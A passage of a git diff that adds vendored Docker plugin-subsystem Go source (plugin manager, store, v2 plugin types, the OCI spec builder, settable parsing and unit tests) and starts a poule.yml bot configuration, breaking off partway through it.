+func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest.Digest, privileges *types.PluginPrivileges) (types.PluginConfig, error) {
+	configRC, err := pm.blobStore.Get(configDigest)
+	if err != nil {
+		return types.PluginConfig{}, err
+	}
+	defer configRC.Close()
+
+	var config types.PluginConfig
+	dec := json.NewDecoder(configRC)
+	if err := dec.Decode(&config); err != nil {
+		return types.PluginConfig{}, errors.Wrapf(err, "failed to parse config")
+	}
+	if dec.More() {
+		return types.PluginConfig{}, errors.New("invalid config json")
+	}
+
+	requiredPrivileges, err := computePrivileges(config)
+	if err != nil {
+		return types.PluginConfig{}, err
+	}
+	if privileges != nil {
+		if err := validatePrivileges(requiredPrivileges, *privileges); err != nil {
+			return types.PluginConfig{}, err
+		}
+	}
+
+	return config, nil
+}
+
+// createPlugin creates a new plugin. take lock before calling.
+func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) {
+	if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. remove store
+		return nil, err
+	}
+
+	config, err := pm.setupNewPlugin(configDigest, blobsums, privileges)
+	if err != nil {
+		return nil, err
+	}
+
+	p = &v2.Plugin{
+		PluginObj: types.Plugin{
+			Name:   name,
+			ID:     stringid.GenerateRandomID(),
+			Config: config,
+		},
+		Config:   configDigest,
+		Blobsums: blobsums,
+	}
+	p.InitEmptySettings()
+
+	pdir := filepath.Join(pm.config.Root, p.PluginObj.ID)
+	if err := os.MkdirAll(pdir, 0700); err != nil {
+		return nil, errors.Wrapf(err, "failed to mkdir %v", pdir)
+	}
+
+	defer func() {
+		if err != nil {
+			os.RemoveAll(pdir)
+		}
+	}()
+
+	if err := os.Rename(rootFSDir, filepath.Join(pdir, rootFSFileName)); err != nil {
+		return nil, errors.Wrap(err, "failed to rename rootfs")
+	}
+
+	if err := pm.save(p); err != nil {
+		return nil, err
+	}
+
+	pm.config.Store.Add(p) // todo: remove
+
+	return p, nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go
new file mode 100644
index 0000000000..72ccae72d3
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager_solaris.go
@@ -0,0 +1,28 @@
+package plugin
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/plugin/v2"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
+	return fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) {
+	return nil, fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
+	return fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) restore(p *v2.Plugin) error {
+	return fmt.Errorf("Not implemented")
+}
+
+// Shutdown plugins
+func (pm *Manager) Shutdown() {
+}
diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go
new file mode 100644
index 0000000000..4469a671f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/manager_windows.go
@@ -0,0 +1,30 @@
+// +build windows
+
+package plugin
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/plugin/v2"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error {
+	return fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) {
+	return nil, fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) disable(p *v2.Plugin, c *controller) error {
+	return fmt.Errorf("Not implemented")
+}
+
+func (pm *Manager) restore(p *v2.Plugin) error {
+	return fmt.Errorf("Not implemented")
+}
+
+// Shutdown plugins
+func (pm *Manager) Shutdown() {
+}
diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go
new file mode 100644
index 0000000000..b7a96a950a
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/store.go
@@ -0,0 +1,263 @@
+package plugin
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
+)
+
+/* allowV1PluginsFallback determines daemon's support for V1 plugins.
+ * When the time comes to remove support for V1 plugins, flipping
+ * this bool is all that will be needed.
+ */
+const allowV1PluginsFallback bool = true
+
+/* defaultAPIVersion is the version of the plugin API for volume, network,
+   IPAM and authz. This is a very stable API. When we update this API, then
+   pluginType should include a version. eg "networkdriver/2.0".
+*/
+const defaultAPIVersion string = "1.0"
+
+// ErrNotFound indicates that a plugin was not found locally.
+type ErrNotFound string
+
+func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) }
+
+// ErrAmbiguous indicates that a plugin was not found locally.
+type ErrAmbiguous string
+
+func (name ErrAmbiguous) Error() string {
+	return fmt.Sprintf("multiple plugins found for %q", string(name))
+}
+
+// GetV2Plugin retreives a plugin by name, id or partial ID.
+func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) {
+	ps.RLock()
+	defer ps.RUnlock()
+
+	id, err := ps.resolvePluginID(refOrID)
+	if err != nil {
+		return nil, err
+	}
+
+	p, idOk := ps.plugins[id]
+	if !idOk {
+		return nil, errors.WithStack(ErrNotFound(id))
+	}
+
+	return p, nil
+}
+
+// validateName returns error if name is already reserved. always call with lock and full name
+func (ps *Store) validateName(name string) error {
+	for _, p := range ps.plugins {
+		if p.Name() == name {
+			return errors.Errorf("plugin %q already exists", name)
+		}
+	}
+	return nil
+}
+
+// GetAll retreives all plugins.
+func (ps *Store) GetAll() map[string]*v2.Plugin {
+	ps.RLock()
+	defer ps.RUnlock()
+	return ps.plugins
+}
+
+// SetAll initialized plugins during daemon restore.
+func (ps *Store) SetAll(plugins map[string]*v2.Plugin) {
+	ps.Lock()
+	defer ps.Unlock()
+	ps.plugins = plugins
+}
+
+func (ps *Store) getAllByCap(capability string) []plugingetter.CompatPlugin {
+	ps.RLock()
+	defer ps.RUnlock()
+
+	result := make([]plugingetter.CompatPlugin, 0, 1)
+	for _, p := range ps.plugins {
+		if p.IsEnabled() {
+			if _, err := p.FilterByCap(capability); err == nil {
+				result = append(result, p)
+			}
+		}
+	}
+	return result
+}
+
+// SetState sets the active state of the plugin and updates plugindb.
+func (ps *Store) SetState(p *v2.Plugin, state bool) {
+	ps.Lock()
+	defer ps.Unlock()
+
+	p.PluginObj.Enabled = state
+}
+
+// Add adds a plugin to memory and plugindb.
+// An error will be returned if there is a collision.
+func (ps *Store) Add(p *v2.Plugin) error {
+	ps.Lock()
+	defer ps.Unlock()
+
+	if v, exist := ps.plugins[p.GetID()]; exist {
+		return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name())
+	}
+	ps.plugins[p.GetID()] = p
+	return nil
+}
+
+// Remove removes a plugin from memory and plugindb.
+func (ps *Store) Remove(p *v2.Plugin) {
+	ps.Lock()
+	delete(ps.plugins, p.GetID())
+	ps.Unlock()
+}
+
+// Get returns an enabled plugin matching the given name and capability.
+func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) {
+	var (
+		p   *v2.Plugin
+		err error
+	)
+
+	// Lookup using new model.
+	if ps != nil {
+		p, err = ps.GetV2Plugin(name)
+		if err == nil {
+			p.AddRefCount(mode)
+			if p.IsEnabled() {
+				return p.FilterByCap(capability)
+			}
+			// Plugin was found but it is disabled, so we should not fall back to legacy plugins
+			// but we should error out right away
+			return nil, ErrNotFound(name)
+		}
+		if _, ok := errors.Cause(err).(ErrNotFound); !ok {
+			return nil, err
+		}
+	}
+
+	// Lookup using legacy model.
+	if allowV1PluginsFallback {
+		p, err := plugins.Get(name, capability)
+		if err != nil {
+			return nil, fmt.Errorf("legacy plugin: %v", err)
+		}
+		return p, nil
+	}
+
+	return nil, err
+}
+
+// GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability.
+func (ps *Store) GetAllManagedPluginsByCap(capability string) []plugingetter.CompatPlugin {
+	return ps.getAllByCap(capability)
+}
+
+// GetAllByCap returns a list of enabled plugins matching the given capability.
+func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) {
+	result := make([]plugingetter.CompatPlugin, 0, 1)
+
+	/* Daemon start always calls plugin.Init thereby initializing a store.
+	 * So store on experimental builds can never be nil, even while
+	 * handling legacy plugins. However, there are legacy plugin unit
+	 * tests where the volume subsystem directly talks with the plugin,
+	 * bypassing the daemon. For such tests, this check is necessary.
+	 */
+	if ps != nil {
+		ps.RLock()
+		result = ps.getAllByCap(capability)
+		ps.RUnlock()
+	}
+
+	// Lookup with legacy model
+	if allowV1PluginsFallback {
+		pl, err := plugins.GetAll(capability)
+		if err != nil {
+			return nil, fmt.Errorf("legacy plugin: %v", err)
+		}
+		for _, p := range pl {
+			result = append(result, p)
+		}
+	}
+	return result, nil
+}
+
+// Handle sets a callback for a given capability. It is only used by network
+// and ipam drivers during plugin registration. The callback registers the
+// driver with the subsystem (network, ipam).
+func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) {
+	pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion)
+
+	// Register callback with new plugin model.
+	ps.Lock()
+	handlers, ok := ps.handlers[pluginType]
+	if !ok {
+		handlers = []func(string, *plugins.Client){}
+	}
+	handlers = append(handlers, callback)
+	ps.handlers[pluginType] = handlers
+	ps.Unlock()
+
+	// Register callback with legacy plugin model.
+	if allowV1PluginsFallback {
+		plugins.Handle(capability, callback)
+	}
+}
+
+// CallHandler calls the registered callback. It is invoked during plugin enable.
+func (ps *Store) CallHandler(p *v2.Plugin) {
+	for _, typ := range p.GetTypes() {
+		for _, handler := range ps.handlers[typ.String()] {
+			handler(p.Name(), p.Client())
+		}
+	}
+}
+
+func (ps *Store) resolvePluginID(idOrName string) (string, error) {
+	ps.RLock() // todo: fix
+	defer ps.RUnlock()
+
+	if validFullID.MatchString(idOrName) {
+		return idOrName, nil
+	}
+
+	ref, err := reference.ParseNamed(idOrName)
+	if err != nil {
+		return "", errors.WithStack(ErrNotFound(idOrName))
+	}
+	if _, ok := ref.(reference.Canonical); ok {
+		logrus.Warnf("canonical references cannot be resolved: %v", ref.String())
+		return "", errors.WithStack(ErrNotFound(idOrName))
+	}
+
+	fullRef := reference.WithDefaultTag(ref)
+
+	for _, p := range ps.plugins {
+		if p.PluginObj.Name == fullRef.String() {
+			return p.PluginObj.ID, nil
+		}
+	}
+
+	var found *v2.Plugin
+	for id, p := range ps.plugins { // this can be optimized
+		if strings.HasPrefix(id, idOrName) {
+			if found != nil {
+				return "", errors.WithStack(ErrAmbiguous(idOrName))
+			}
+			found = p
+		}
+	}
+	if found == nil {
+		return "", errors.WithStack(ErrNotFound(idOrName))
+	}
+	return found.PluginObj.ID, nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go
new file mode 100644
index 0000000000..6b1f6a9418
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/store_test.go
@@ -0,0 +1,33 @@
+package plugin
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/plugin/v2"
+)
+
+func TestFilterByCapNeg(t *testing.T) {
+	p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}}
+	iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"}
+	i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}}
+	p.PluginObj.Config.Interface = i
+
+	_, err := p.FilterByCap("foobar")
+	if err == nil {
+		t.Fatalf("expected inadequate error, got %v", err)
+	}
+}
+
+func TestFilterByCapPos(t *testing.T) {
+	p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}}
+
+	iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"}
+	i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}}
+	p.PluginObj.Config.Interface = i
+
+	_, err := p.FilterByCap("volumedriver")
+	if err != nil {
+		t.Fatalf("expected no error, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go
new file mode 100644
index 0000000000..93b489a14b
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go
@@ -0,0 +1,244 @@
+package v2
+
+import (
+	"fmt"
+	"strings"
+	"sync"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+)
+
+// Plugin represents an individual plugin.
+type Plugin struct {
+	mu              sync.RWMutex
+	PluginObj       types.Plugin `json:"plugin"` // todo: embed struct
+	pClient         *plugins.Client
+	refCount        int
+	PropagatedMount string // TODO: make private
+	Rootfs          string // TODO: make private
+
+	Config   digest.Digest
+	Blobsums []digest.Digest
+}
+
+const defaultPluginRuntimeDestination = "/run/docker/plugins"
+
+// ErrInadequateCapability indicates that the plugin did not have the requested capability.
+type ErrInadequateCapability struct {
+	cap string
+}
+
+func (e ErrInadequateCapability) Error() string {
+	return fmt.Sprintf("plugin does not provide %q capability", e.cap)
+}
+
+// BasePath returns the path to which all paths returned by the plugin are relative to.
+// For Plugin objects this returns the host path of the plugin container's rootfs.
+func (p *Plugin) BasePath() string {
+	return p.Rootfs
+}
+
+// Client returns the plugin client.
+func (p *Plugin) Client() *plugins.Client {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.pClient
+}
+
+// SetPClient set the plugin client.
+func (p *Plugin) SetPClient(client *plugins.Client) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+
+	p.pClient = client
+}
+
+// IsV1 returns true for V1 plugins and false otherwise.
+func (p *Plugin) IsV1() bool {
+	return false
+}
+
+// Name returns the plugin name.
+func (p *Plugin) Name() string {
+	return p.PluginObj.Name
+}
+
+// FilterByCap query the plugin for a given capability.
+func (p *Plugin) FilterByCap(capability string) (*Plugin, error) {
+	capability = strings.ToLower(capability)
+	for _, typ := range p.PluginObj.Config.Interface.Types {
+		if typ.Capability == capability && typ.Prefix == "docker" {
+			return p, nil
+		}
+	}
+	return nil, ErrInadequateCapability{capability}
+}
+
+// InitEmptySettings initializes empty settings for a plugin.
+func (p *Plugin) InitEmptySettings() {
+	p.PluginObj.Settings.Mounts = make([]types.PluginMount, len(p.PluginObj.Config.Mounts))
+	copy(p.PluginObj.Settings.Mounts, p.PluginObj.Config.Mounts)
+	p.PluginObj.Settings.Devices = make([]types.PluginDevice, len(p.PluginObj.Config.Linux.Devices))
+	copy(p.PluginObj.Settings.Devices, p.PluginObj.Config.Linux.Devices)
+	p.PluginObj.Settings.Env = make([]string, 0, len(p.PluginObj.Config.Env))
+	for _, env := range p.PluginObj.Config.Env {
+		if env.Value != nil {
+			p.PluginObj.Settings.Env = append(p.PluginObj.Settings.Env, fmt.Sprintf("%s=%s", env.Name, *env.Value))
+		}
+	}
+	p.PluginObj.Settings.Args = make([]string, len(p.PluginObj.Config.Args.Value))
+	copy(p.PluginObj.Settings.Args, p.PluginObj.Config.Args.Value)
+}
+
+// Set is used to pass arguments to the plugin.
+func (p *Plugin) Set(args []string) error {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+
+	if p.PluginObj.Enabled {
+		return fmt.Errorf("cannot set on an active plugin, disable plugin before setting")
+	}
+
+	sets, err := newSettables(args)
+	if err != nil {
+		return err
+	}
+
+	// TODO(vieux): lots of code duplication here, needs to be refactored.
+
+next:
+	for _, s := range sets {
+		// range over all the envs in the config
+		for _, env := range p.PluginObj.Config.Env {
+			// found the env in the config
+			if env.Name == s.name {
+				// is it settable ?
+				if ok, err := s.isSettable(allowedSettableFieldsEnv, env.Settable); err != nil {
+					return err
+				} else if !ok {
+					return fmt.Errorf("%q is not settable", s.prettyName())
+				}
+				// is it, so lets update the settings in memory
+				updateSettingsEnv(&p.PluginObj.Settings.Env, &s)
+				continue next
+			}
+		}
+
+		// range over all the mounts in the config
+		for _, mount := range p.PluginObj.Config.Mounts {
+			// found the mount in the config
+			if mount.Name == s.name {
+				// is it settable ?
+				if ok, err := s.isSettable(allowedSettableFieldsMounts, mount.Settable); err != nil {
+					return err
+				} else if !ok {
+					return fmt.Errorf("%q is not settable", s.prettyName())
+				}
+
+				// it is, so lets update the settings in memory
+				*mount.Source = s.value
+				continue next
+			}
+		}
+
+		// range over all the devices in the config
+		for _, device := range p.PluginObj.Config.Linux.Devices {
+			// found the device in the config
+			if device.Name == s.name {
+				// is it settable ?
+				if ok, err := s.isSettable(allowedSettableFieldsDevices, device.Settable); err != nil {
+					return err
+				} else if !ok {
+					return fmt.Errorf("%q is not settable", s.prettyName())
+				}
+
+				// it is, so lets update the settings in memory
+				*device.Path = s.value
+				continue next
+			}
+		}
+
+		// found the name in the config
+		if p.PluginObj.Config.Args.Name == s.name {
+			// is it settable ?
+			if ok, err := s.isSettable(allowedSettableFieldsArgs, p.PluginObj.Config.Args.Settable); err != nil {
+				return err
+			} else if !ok {
+				return fmt.Errorf("%q is not settable", s.prettyName())
+			}
+
+			// it is, so lets update the settings in memory
+			p.PluginObj.Settings.Args = strings.Split(s.value, " ")
+			continue next
+		}
+
+		return fmt.Errorf("setting %q not found in the plugin configuration", s.name)
+	}
+
+	return nil
+}
+
+// IsEnabled returns the active state of the plugin.
+func (p *Plugin) IsEnabled() bool {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.PluginObj.Enabled
+}
+
+// GetID returns the plugin's ID.
+func (p *Plugin) GetID() string {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.PluginObj.ID
+}
+
+// GetSocket returns the plugin socket.
+func (p *Plugin) GetSocket() string {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.PluginObj.Config.Interface.Socket
+}
+
+// GetTypes returns the interface types of a plugin.
+func (p *Plugin) GetTypes() []types.PluginInterfaceType {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.PluginObj.Config.Interface.Types
+}
+
+// GetRefCount returns the reference count.
+func (p *Plugin) GetRefCount() int {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+
+	return p.refCount
+}
+
+// AddRefCount adds to reference count.
+func (p *Plugin) AddRefCount(count int) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+
+	p.refCount += count
+}
+
+// Acquire increments the plugin's reference count
+// This should be followed up by `Release()` when the plugin is no longer in use.
+func (p *Plugin) Acquire() {
+	p.AddRefCount(plugingetter.ACQUIRE)
+}
+
+// Release decrements the plugin's reference count
+// This should only be called when the plugin is no longer in use, e.g. with
+// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE)
+func (p *Plugin) Release() {
+	p.AddRefCount(plugingetter.RELEASE)
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
new file mode 100644
index 0000000000..e980e7f29a
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go
@@ -0,0 +1,121 @@
+// +build linux
+
+package v2
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/oci"
+	"github.com/docker/docker/pkg/system"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+)
+
+// InitSpec creates an OCI spec from the plugin's config.
+func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
+	s := oci.DefaultSpec()
+	s.Root = specs.Root{
+		Path:     p.Rootfs,
+		Readonly: false, // TODO: all plugins should be readonly? settable in config?
+	}
+
+	userMounts := make(map[string]struct{}, len(p.PluginObj.Settings.Mounts))
+	for _, m := range p.PluginObj.Settings.Mounts {
+		userMounts[m.Destination] = struct{}{}
+	}
+
+	execRoot = filepath.Join(execRoot, p.PluginObj.ID)
+	if err := os.MkdirAll(execRoot, 0700); err != nil {
+		return nil, errors.WithStack(err)
+	}
+
+	mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{
+		Source:      &execRoot,
+		Destination: defaultPluginRuntimeDestination,
+		Type:        "bind",
+		Options:     []string{"rbind", "rshared"},
+	})
+
+	if p.PluginObj.Config.Network.Type != "" {
+		// TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize)
+		if p.PluginObj.Config.Network.Type == "host" {
+			oci.RemoveNamespace(&s, specs.NamespaceType("network"))
+		}
+		etcHosts := "/etc/hosts"
+		resolvConf := "/etc/resolv.conf"
+		mounts = append(mounts,
+			types.PluginMount{
+				Source:      &etcHosts,
+				Destination: etcHosts,
+				Type:        "bind",
+				Options:     []string{"rbind", "ro"},
+			},
+			types.PluginMount{
+				Source:      &resolvConf,
+				Destination: resolvConf,
+				Type:        "bind",
+				Options:     []string{"rbind", "ro"},
+			})
+	}
+
+	for _, mnt := range mounts {
+		m := specs.Mount{
+			Destination: mnt.Destination,
+			Type:        mnt.Type,
+			Options:     mnt.Options,
+		}
+		if mnt.Source == nil {
+			return nil, errors.New("mount source is not specified")
+		}
+		m.Source = *mnt.Source
+		s.Mounts = append(s.Mounts, m)
+	}
+
+	for i, m := range s.Mounts {
+		if strings.HasPrefix(m.Destination, "/dev/") {
+			if _, ok := userMounts[m.Destination]; ok {
+				s.Mounts = append(s.Mounts[:i], s.Mounts[i+1:]...)
+			}
+		}
+	}
+
+	if p.PluginObj.Config.PropagatedMount != "" {
+		p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount)
+		s.Linux.RootfsPropagation = "rshared"
+	}
+
+	if p.PluginObj.Config.Linux.AllowAllDevices {
+		rwm := "rwm"
+		s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}}
+	}
+	for _, dev := range p.PluginObj.Settings.Devices {
+		path := *dev.Path
+		d, dPermissions, err := oci.DevicesFromPath(path, path, "rwm")
+		if err != nil {
+			return nil, errors.WithStack(err)
+		}
+		s.Linux.Devices = append(s.Linux.Devices, d...)
+		s.Linux.Resources.Devices = append(s.Linux.Resources.Devices, dPermissions...)
+	}
+
+	envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1)
+	envs[0] = "PATH=" + system.DefaultPathEnv
+	envs = append(envs, p.PluginObj.Settings.Env...)
+
+	args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...)
+	cwd := p.PluginObj.Config.WorkDir
+	if len(cwd) == 0 {
+		cwd = "/"
+	}
+	s.Process.Terminal = false
+	s.Process.Args = args
+	s.Process.Cwd = cwd
+	s.Process.Env = envs
+
+	s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...)
+
+	return &s, nil
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
new file mode 100644
index 0000000000..e60fb8311e
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go
@@ -0,0 +1,14 @@
+// +build !linux
+
+package v2
+
+import (
+	"errors"
+
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// InitSpec creates an OCI spec from the plugin's config.
+func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) {
+	return nil, errors.New("not supported")
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/settable.go b/vendor/github.com/docker/docker/plugin/v2/settable.go
new file mode 100644
index 0000000000..79c6befc24
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/v2/settable.go
@@ -0,0 +1,102 @@
+package v2
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+)
+
+type settable struct {
+	name  string
+	field string
+	value string
+}
+
+var (
+	allowedSettableFieldsEnv     = []string{"value"}
+	allowedSettableFieldsArgs    = []string{"value"}
+	allowedSettableFieldsDevices = []string{"path"}
+	allowedSettableFieldsMounts  = []string{"source"}
+
+	errMultipleFields = errors.New("multiple fields are settable, one must be specified")
+	errInvalidFormat  = errors.New("invalid format, must be <name>[.<field>][=<value>]")
+)
+
+func newSettables(args []string) ([]settable, error) {
+	sets := make([]settable, 0, len(args))
+	for _, arg := range args {
+		set, err := newSettable(arg)
+		if err != nil {
+			return nil, err
+		}
+		sets = append(sets, set)
+	}
+	return sets, nil
+}
+
+func newSettable(arg string) (settable, error) {
+	var set settable
+	if i := strings.Index(arg, "="); i == 0 {
+		return set, errInvalidFormat
+	} else if i < 0 {
+		set.name = arg
+	} else {
+		set.name = arg[:i]
+		set.value = arg[i+1:]
+	}
+
+	if i := strings.LastIndex(set.name, "."); i > 0 {
+		set.field = set.name[i+1:]
+		set.name = arg[:i]
+	}
+
+	return set, nil
+}
+
+// prettyName return name.field if there is a field, otherwise name.
+func (set *settable) prettyName() string {
+	if set.field != "" {
+		return fmt.Sprintf("%s.%s", set.name, set.field)
+	}
+	return set.name
+}
+
+func (set *settable) isSettable(allowedSettableFields []string, settable []string) (bool, error) {
+	if set.field == "" {
+		if len(settable) == 1 {
+			// if field is not specified and there only one settable, default to it.
+			set.field = settable[0]
+		} else if len(settable) > 1 {
+			return false, errMultipleFields
+		}
+	}
+
+	isAllowed := false
+	for _, allowedSettableField := range allowedSettableFields {
+		if set.field == allowedSettableField {
+			isAllowed = true
+			break
+		}
+	}
+
+	if isAllowed {
+		for _, settableField := range settable {
+			if set.field == settableField {
+				return true, nil
+			}
+		}
+	}
+
+	return false, nil
+}
+
+func updateSettingsEnv(env *[]string, set *settable) {
+	for i, e := range *env {
+		if parts := strings.SplitN(e, "=", 2); parts[0] == set.name {
+			(*env)[i] = fmt.Sprintf("%s=%s", set.name, set.value)
+			return
+		}
+	}
+
+	*env = append(*env, fmt.Sprintf("%s=%s", set.name, set.value))
+}
diff --git a/vendor/github.com/docker/docker/plugin/v2/settable_test.go b/vendor/github.com/docker/docker/plugin/v2/settable_test.go
new file mode 100644
index 0000000000..7183f3a679
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/v2/settable_test.go
@@ -0,0 +1,91 @@
+package v2
+
+import (
+	"reflect"
+	"testing"
+)
+
+func TestNewSettable(t *testing.T) {
+	contexts := []struct {
+		arg   string
+		name  string
+		field string
+		value string
+		err   error
+	}{
+		{"name=value", "name", "", "value", nil},
+		{"name", "name", "", "", nil},
+		{"name.field=value", "name", "field", "value", nil},
+		{"name.field", "name", "field", "", nil},
+		{"=value", "", "", "", errInvalidFormat},
+		{"=", "", "", "", errInvalidFormat},
+	}
+
+	for _, c := range contexts {
+		s, err := newSettable(c.arg)
+		if err != c.err {
+			t.Fatalf("expected error to be %v, got %v", c.err, err)
+		}
+
+		if s.name != c.name {
+			t.Fatalf("expected name to be %q, got %q", c.name, s.name)
+		}
+
+		if s.field != c.field {
+			t.Fatalf("expected field to be %q, got %q", c.field, s.field)
+		}
+
+		if s.value != c.value {
+			t.Fatalf("expected value to be %q, got %q", c.value, s.value)
+		}
+
+	}
+}
+
+func TestIsSettable(t *testing.T) {
+	contexts := []struct {
+		allowedSettableFields []string
+		set                   settable
+		settable              []string
+		result                bool
+		err                   error
+	}{
+		{allowedSettableFieldsEnv, settable{}, []string{}, false, nil},
+		{allowedSettableFieldsEnv, settable{field: "value"}, []string{}, false, nil},
+		{allowedSettableFieldsEnv, settable{}, []string{"value"}, true, nil},
+		{allowedSettableFieldsEnv, settable{field: "value"}, []string{"value"}, true, nil},
+		{allowedSettableFieldsEnv, settable{field: "foo"}, []string{"value"}, false, nil},
+		{allowedSettableFieldsEnv, settable{field: "foo"}, []string{"foo"}, false, nil},
+		{allowedSettableFieldsEnv, settable{}, []string{"value1", "value2"}, false, errMultipleFields},
+	}
+
+	for _, c := range contexts {
+		if res, err := c.set.isSettable(c.allowedSettableFields, c.settable); res != c.result {
+			t.Fatalf("expected result to be %t, got %t", c.result, res)
+		} else if err != c.err {
+			t.Fatalf("expected error to be %v, got %v", c.err, err)
+		}
+	}
+}
+
+func TestUpdateSettinsEnv(t *testing.T) {
+	contexts := []struct {
+		env    []string
+		set    settable
+		newEnv []string
+	}{
+		{[]string{}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}},
+		{[]string{"DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"DEBUG=1"}},
+		{[]string{"FOO=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}},
+		{[]string{"FOO=0", "DEBUG=0"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1"}},
+		{[]string{"FOO=0", "DEBUG=0", "BAR=1"}, settable{name: "DEBUG", value: "1"}, []string{"FOO=0", "DEBUG=1", "BAR=1"}},
+	}
+
+	for _, c := range contexts {
+		updateSettingsEnv(&c.env, &c.set)
+
+		if !reflect.DeepEqual(c.env, c.newEnv) {
+			t.Fatalf("expected env to be %q, got %q", c.newEnv, c.env)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/poule.yml b/vendor/github.com/docker/docker/poule.yml
new file mode 100644
index 0000000000..61aab4551b
--- /dev/null
+++ b/vendor/github.com/docker/docker/poule.yml
@@ -0,0 +1,88 @@
+# Add a "status/0-triage" to every newly opened pull request.
+- triggers:
+      pull_request: [ opened ]
+  operations:
+      - type:       label
+        settings: {
+            patterns: {
+                status/0-triage:     [ ".*" ],
